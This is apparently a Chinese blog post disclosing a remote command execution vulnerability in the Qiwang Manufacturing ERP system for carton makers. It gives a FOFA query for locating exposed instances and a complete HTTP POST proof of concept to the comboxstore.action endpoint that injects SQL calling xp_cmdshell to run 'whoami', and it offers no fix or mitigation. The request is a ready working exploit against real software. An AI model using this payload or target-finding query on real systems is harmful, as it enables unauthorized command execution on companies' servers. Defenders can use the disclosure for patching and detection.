企望制造ERP系统存在RCE漏洞

漏洞描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞复现

FOFA

复制代码
title="企望制造ERP系统"

POC

复制代码
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

bp 成功执行命令

相关推荐
Xudde.1 小时前
班级作业笔记报告0x06
笔记·学习·安全·web安全
zhongerzixunshi1 小时前
一篇文章全面了解智能制造能力成熟度标准CMMM符合性评估
大数据·人工智能·制造
NaclarbCSDN1 小时前
User ID controlled by request parameter with password disclosure-Burp 复现
网络·安全·web安全
智慧化智能化数字化方案2 小时前
智能制造——解读129页MES项目实施过程精解【附全文阅读】
制造·mes项目实施过程精解·mes实施方案·mes解决方案
公众号/头条号:技术很有趣2 小时前
网页接口请求安全链路完整分析
安全
超级AI_mes2 小时前
2026电子组装行业MES转型指南:从智能防错到AI驱动的全链路数字化方案
人工智能·科技·5g·信息可视化·社交电子·能源·制造
chipsense3 小时前
从毫安预警到安培计量:芯森电子FR系列传感器在储能安全与管理中的协同应用
安全·储能·磁通门传感器
EasyDSS3 小时前
企业级融媒体平台私有化视频会议系统EasyDSS私有化部署打造安全可控的校园“音视频中枢”
安全·音视频·媒体
soso19683 小时前
Claude Code 源码泄露之五:安全沙盒实现
安全·源码泄露·claude code·安全沙盒
admin and root3 小时前
XSS之Flash弹窗钓鱼
前端·网络·安全·web安全·渗透测试·xss·src